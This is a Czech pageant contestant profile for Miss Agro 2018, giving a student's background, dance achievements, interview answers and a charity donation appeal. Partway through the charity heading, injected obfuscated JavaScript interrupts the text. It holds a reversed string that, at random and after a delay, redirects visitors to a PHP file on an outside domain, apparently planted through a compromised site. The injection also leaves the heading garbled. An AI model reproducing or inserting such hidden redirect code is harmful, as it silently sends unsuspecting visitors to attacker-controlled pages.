Tereza Pánková

Profil

Fakulta: PEF
Obor: Podnikání a administrativa (PAA)
Ročník: 2.
Věk:
21

Tereza od dětství miluje tanec a za život se protancovala od baletu až po cheerleading, který lze brát jako sport. Jejím největším úspěchem je 4. místo z mistrovství světa a 3. místo z mistrovství České republiky ve fitness aerobicu. Ráda cestuje, fotí, sportuje, chodí do divadel a na koncerty a tráví čas s nejbližšími. Někdy je tvrdohlavá, ale umí uznat pokud má někdo pravdu. Je cílevědomá, upřímná a snaží se pomáhat ostatním, i když sama pomoc někdy odmítá.

“Podporujeme

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}domovů“ css=“.vc_custom_1492523222849{margin-top: 30px !important;}“]Miss Agro podporuje mladé studenty z dětských domovů prostřednictvím Nadačního fondu Veroniky Kašákové. Podpořte je i Vy! Přispět můžete libovolnou částkou na účet 2113124252/2700. Více informací najdete na webových stránkách www.nfvk.cz. Děkujeme, že pomáháte!

Proč by ses zrovna Ty měla stát Miss Agro 2018?

To je ta otázka, na kterou člověk nezná odpověď. Všechny jsme krásné a každá jsme originál. Není to o tom, která je krásnější nebo hubenější. Osobně si myslím, že osobnost jako taková je někdy mnohem důležitější, než vizáž. Mám ráda výzvy, chci nasbírat další zkušenosti a zažít něco nového. A když tu studuji, proč to nezkusit.

Kdyby ses mohla narodit ještě jednou, kým bys chtěla být?

Kdybych se mohla narodit ještě jednou, chtěla bych být mnou. I když každý chceme něco, co nemáme nebo být někým jiným. Narodila jsem se v úžasné a milující rodině a kdo ví, třeba bych takové štěstí už neměla a nemohla bych tady být. Hned bych prožila to dětsví bez dob telefonů a sociálních sítí a zopakovala si tu dětskou bezstarostnost.

Proč sis vybrala zrovna studium na ČZU a co máš na ní nejraději?

Studium na ČZU jsem si vybrala především kvůli dobrým ohlasům, měla jsem tu sestru která zde úspěšně odstudovala a poradila mi. Líbí se mi prostředí a příroda okolo. Navíc člověk nikde nemusí cestovat, vše máme na jednom místě.

Přihlásila ses do Miss Agro sama nebo Tě přihlásil někdo jiný?

Přihlásil mě někdo jiný a já jsem pak měla tu rozhodovací část, zda to zkusit/nezkusit.